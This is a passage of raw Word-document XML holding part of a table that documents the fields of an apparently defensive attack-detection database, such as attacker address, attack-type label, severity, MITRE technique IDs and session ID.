              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NOT NULL, INDEX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Attacker address.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">attack_type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NOT NULL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">One of 16 rule labels, e.g. BRUTE_FORCE, MALWARE_DELIVERY, BOTNET_C2.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NOT NULL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">LOW, MEDIUM, HIGH or CRITICAL (only escalates on update).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">protocol, device</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NULLABLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Where the attack happened.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">details</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Evidence summary, e.g. '25 failed SSH logins in 10 min'.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">mitre, mitre_names</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT[]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">MITRE ATT&amp;CK technique IDs and names (Enterprise + ICS).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">session_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">UUID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NULLABLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Session the detection belongs to, when it is session-specific.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">dedupe_key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT</w:t>
